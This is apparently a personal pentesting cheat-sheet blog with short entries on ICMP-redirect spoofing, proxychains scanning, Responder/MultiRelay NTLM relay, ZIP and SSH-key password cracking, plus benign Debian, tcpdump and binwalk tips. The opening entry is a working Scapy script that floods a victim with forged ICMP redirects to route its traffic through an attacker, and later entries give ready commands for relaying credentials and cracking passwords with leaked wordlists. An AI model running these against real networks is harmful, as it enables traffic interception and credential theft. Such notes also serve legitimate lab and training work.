Categorieën
ICMP-Redirect Attack

ICMP-Redirect Attack

Enable IP forwarding and Source NAT translation for Victim subnet

#sudo echo 1 > /proc/sys/net/ipv4/ip_forward
#sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only for traffic forward)
#sudo iptables -t nat -L
  • ip – gateway = 10.100.31.1
  • ip – victim = 10.100.13.126
  • ip – attacker = 10.100.13.20
  • ip- victime website = 10.23.56.100

Scapy create ICMP-Redirect packet (type=5) for a better gateway to destination 10.23.56.100

>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
bound method IP.display of IP  src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
bound method ICMP.display of >
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
bound method IP.display of IP  src=10.100.13.126 dst=10.23.56.100 |>>


# Creating and sending ICMP redirect packets

originalRouterIP='10.100.13.1'
attackerIP='10.100.13.20'
victimIP='10.100.13.126'
serverIP='10.23.56.100'

# We create an ICMP Redirect packet

ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim Ip

redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP

fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

while True:send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>
Categorieën
Proxychains

Proxychains

proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129
Categorieën
Debian Uncategorized

Debian Tips

How to list all services in Debian

If you want to view the entire services running in the Debian 10, you can run the following command.

ls /etc/init.d

If you want to get a more detailed list of all services and processes running in your Debian operating system, execute the following command.

Systemctl list-unit-files

How to check the status of a particular service using init.d

There are several ways to check the status of a particular service whether it is running or not. One of such methods is by using init.d. You can execute the command with root privileges having following syntax,

/etc/init.d/{servicename} status

Let’s check the status of the networking service. The complete command should look like the following,

/etc/init.d/networking status

How to stop, start and restart a particular service

There are two methods of stopping and starting a particular service. I will list here both of the methods.

Start and stop a service using init.d

Let me start by stopping the already running networking service to show you how to stop any service with the help of init.d. Execute the following command with root privileges,

/etc/init.d/networking stop

Print route

route -n
Categorieën
Responder Uncategorized

Responder

1. Run RunFinger.py -i<target IP> against target

2. Modify the Responder.confconfiguration file and disable the “SMB” server and “HTTP” server options by setting the values to “Off”.

3.python Responder.py -I eth0 –lm

4. python MultiRelay.py -t <target IP> –u ALL

 

Categorieën
Uncategorized ZIP crack

ZIP crack

fcrackzip -D -p /usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt XXX.zip

Categorieën
Uncategorized Windows Tricks

Windows Tricks

Categorieën
Time Uncategorized

TIME

net time -S IP -U “”

date -s time

rdate -n ip

Categorieën
TCPDUMP Uncategorized

TCPDUMP

tcpdump -i tun0 icmp (for protocol filter)

Categorieën
Steno Uncategorized

Steno

Look at picture for content

  • binwalk file.png

Extract files from image

  • binwalk -Me file.png
Categorieën
SSH Uncategorized

SSH

Use SSH private key

.priv

chmod 600 key.priv

ssh -i key.priv user@x.x.x.x

Extract Password from id_rsa key

python /usr/share/john/ssh2john.py id_rsa > test

john –wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test